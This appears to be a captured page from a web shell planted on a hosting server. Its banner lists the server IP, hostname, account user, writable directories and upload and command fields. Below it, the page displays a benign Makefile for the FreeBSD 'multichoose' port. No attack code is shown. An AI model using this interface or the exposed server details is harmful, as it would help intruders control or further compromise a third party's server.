403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/math/multichoose/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/math/multichoose/files/Makefile
# Use ?= to allow overriding from the env or command-line, e.g.
#
#       make CXXFLAGS="-O3 -fPIC" install
#
# Package managers will override many of these variables automatically, so
# this is aimed at making it easy to create packages (Debian packages,
# FreeBSD ports, MacPorts, pkgsrc, etc.)

CC ?=		cc
CXX ?=		c++
DESTDIR ?=	stage
PREFIX ?=	/usr/local
MKDIR ?=	mkdir
INSTALL ?=	install -c
STRIP ?=	strip
AR ?=		ar

BINS =	multichoose cmultichoose multipermute

all: ${BINS}

#multichoose_recursive: multichoose_recursive.cpp
#	${CXX} multichoose_recursive.cpp -o multichoose_recursive

multichoose: multichoose.cpp multichoose.h
	${CXX} multichoose.cpp -o multichoose

multipermute: multipermute.cpp multipermute.h
	${CXX} multipermute.cpp -o multipermute

cmultichoose: multichoose.c
	${CC} multichoose.c -o cmultichoose

install: all
	${MKDIR} -p ${DESTDIR}${PREFIX}/bin
	${MKDIR} -p ${DESTDIR}${PREFIX}/include/multichoose
	${INSTALL} ${BINS} ${DESTDIR}${PREFIX}/bin
	${INSTALL} *.py ${DESTDIR}${PREFIX}/bin
	${INSTALL} *.h ${DESTDIR}${PREFIX}/include/multichoose

install-strip: install
	${STRIP} ${DESTDIR}${PREFIX}/bin/*e

clean:
	rm -rf ${BINS} ${DESTDIR}

Youez - 2016 - github.com/yon3zu
LinuXploit